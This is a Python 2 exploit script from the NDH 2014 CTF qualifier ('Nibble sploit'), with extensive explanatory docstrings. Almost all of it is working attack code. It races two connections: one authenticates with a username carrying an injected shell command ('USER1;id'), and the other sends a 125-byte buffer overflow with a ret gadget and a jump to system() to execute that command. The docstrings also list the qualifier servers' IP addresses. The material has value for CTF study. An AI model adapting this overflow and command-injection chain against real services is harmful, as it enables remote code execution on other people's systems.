
#ndh2k14 #ndhquals Nibble sploit

  1. #!/usr/bin/env python2
  2. # -*- coding: utf-8 -*-
  3. # quals NDH 2014
  4. # Nibble Sploit
  5. # pollypocket - y0ug
  6.  
  7. import time
  8. import curses
  9. import socket
  10. import chat_protocol_pb2
  11. from curses.textpad import rectangle
  12. from struct import pack
  13. import threading
  14. import signal
  15. import sys
  16. import threading
  17. import struct
  18.  
  19.  
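class NetWrapper:
    """Minimal client for the challenge's length-prefixed protobuf chat protocol.

    Every frame sent by this class is ``<u32 little-endian length><opcode><protobuf>``
    where the opcode byte is ``"1"`` for an AuthPacket and ``"2"`` for a
    ChatMessage (see auth() and sendmessage()). The protobuf classes come from
    the challenge's generated ``chat_protocol_pb2`` module.

    Attributes set along the way: ``socket`` (by connect()), ``username`` (by
    auth()) and ``token`` (by wait_authresponse()); all start as None.
    """

    def __init__(self):
        self.socket = None
        self.username = None
        self.token = None

    def connect(self, host="127.0.0.1", port=4567, timeout=60):
        """Open a TCP connection to the service and return True on success.

        ``host``/``port`` default to the local copy of the service the exploit
        was last run against (the qualifier boxes were 54.217.202.218 and
        46.231.151.147). On failure the half-created socket is closed instead
        of leaked, and only socket-level errors (including timeouts) are
        swallowed: the original bare ``except`` also hid KeyboardInterrupt,
        which made the retry loops built on this method impossible to stop.
        """
        s = None
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(timeout)
            s.connect((host, port))
        except socket.error:
            if s is not None:
                s.close()
            return False
        self.socket = s
        return True

    def _send_frame(self, opcode, body):
        """Prefix ``opcode + body`` with its u32 LE length and send it in full.

        sendall() is used rather than send(): send() may write only part of
        the buffer and the original ignored its return value, which on a
        length-prefixed protocol would leave the peer's parser mid-frame.
        """
        data = opcode + body
        self.socket.sendall(pack('<I', len(data)) + data)

    def auth(self, username):
        """Send an AuthPacket (opcode "1") for ``username``.

        The reply is not read here; call wait_authresponse() for it.
        """
        authpacket = chat_protocol_pb2.AuthPacket()
        authpacket.username = username
        self.username = username
        self._send_frame("1", authpacket.SerializeToString())

    def wait_authresponse(self):
        """Read one TokenResponse; store its token and return True iff authstatus == 1.

        NOTE(review): the reply is parsed straight out of a single recv(1024),
        with no length prefix or opcode stripped and no handling of a short
        read — kept as in the original, so either the server answers with a
        bare protobuf or this only worked because the reply fits one segment;
        confirm against the service before relying on it. An empty read (peer
        closed) parses as an all-default message and yields False.
        """
        authresponse = chat_protocol_pb2.TokenResponse()
        authresponse.ParseFromString(self.socket.recv(1024))
        if authresponse.authstatus != 1:
            return False
        self.token = authresponse.token
        return True

    def sendmessage(self, token, username, msg):
        """Send a ChatMessage (opcode "2") carrying ``token`` as the cookie.

        Messages shorter than two characters are dropped without sending
        anything (original behaviour, reason not recorded).
        """
        if len(msg) < 2:
            return
        usermessage = chat_protocol_pb2.ChatMessage()
        usermessage.cookie = token
        usermessage.nickname = username
        usermessage.textmessage = msg
        self._send_frame("2", usermessage.SerializeToString())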
  61.  
  62.  
# Race gate shared by the two worker threads: classic_user() sets it for the
# moment its auth frame is being sent and clears it right after;
# trigger_user() blocks on it before sending the overflow frame.
event = threading.Event()
  64.  
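def classic_user():
    """Repeatedly plant the command-carrying username on the target.

    Loops until a connection attempt fails. Each round authenticates as
    ``"USER1;id"`` and raises ``event`` only while that auth frame is being
    sent, so the overflow from trigger_user() lands while this string is live
    on the server side. The exploit is a race: the 2 s pause between rounds
    is just the retry cadence, not a protocol requirement. The ``;id`` tail is
    presumably what the system() call reached by trigger_user()'s payload ends
    up executing — confirm against the binary.

    The event is cleared and the socket closed in a ``finally`` block: in the
    original, an exception in auth() killed this thread with the event still
    set, leaving trigger_user() firing every second with nothing planted.
    """
    n1 = NetWrapper()
    while n1.connect():
        event.set()
        try:
            n1.auth("USER1;id")
        finally:
            event.clear()
            n1.socket.close()
        time.sleep(2)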
  73.  
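def _varint(n):
    """Encode a non-negative int as a protobuf base-128 varint (7 bits per byte, LSB group first, high bit set while more follow)."""
    out = ""
    while True:
        byte = n & 0x7f
        n >>= 7
        if not n:
            return out + chr(byte)
        out += chr(byte | 0x80)


def _auth_frame(payload):
    """Build the raw wire frame for an AuthPacket whose username is ``payload``.

    Hand-assembled instead of going through chat_protocol_pb2 so the username
    can carry arbitrary bytes: opcode ``"1"`` (0x31), protobuf tag 0x0a (field
    1, wire type length-delimited), the username length as a varint, then the
    username; the whole thing behind the u32 LE frame length. The original
    hard-coded one-byte (< 0x80) and two-byte (< 0x100) varints and silently
    returned from the thread for anything longer; this encodes any length and
    is byte-identical to the original for the lengths it handled.
    """
    body = "\x31\x0a" + _varint(len(payload)) + payload
    return struct.pack('<I', len(body)) + body


def trigger_user():
    """Send the overflowing auth frame each time classic_user() signals.

    The username is 125 filler bytes followed by two 32-bit addresses, a
    ``ret`` gadget and a jump to system() (labels from the original; the
    fixed 0x0804xxxx values mean a non-PIE 32-bit target). Presumably the
    ``ret`` just pads the chain so system() is reached with the right stack
    layout, with its argument coming from what classic_user() leaves behind —
    confirm against the binary. The payload is 133 bytes, so the length is a
    two-byte varint.

    The frame is constant, so it is built once outside the loop; the socket
    is closed in a ``finally`` so a failed send does not leak it. Loops until
    a connection attempt fails.
    """
    ret_gadget = 0x8049d4d    # ret;
    jmp_system = 0x08048BD0   # jmp system
    payload = "Z" * 125
    payload += struct.pack('<I', ret_gadget)
    payload += struct.pack('<I', jmp_system)
    pwn = _auth_frame(payload)

    n1 = NetWrapper()
    while n1.connect():
        # Block until classic_user() has its command string in flight.
        event.wait()
        try:
            n1.socket.sendall(pwn)
        finally:
            n1.socket.close()
        time.sleep(1)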
  96.  
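if __name__ == "__main__":
    # Both workers loop until a connect() fails, so they never finish on
    # their own. They are marked daemon and the join is polled with a
    # timeout so that Ctrl-C actually reaches the main thread (Python 2's
    # untimed join() is not interruptible) and ends the process instead of
    # hanging on two non-daemon threads.
    thread = threading.Thread(target=classic_user)
    thread2 = threading.Thread(target=trigger_user)
    thread.daemon = True
    thread2.daemon = True
    thread.start()
    thread2.start()
    while thread2.is_alive():
        thread2.join(1)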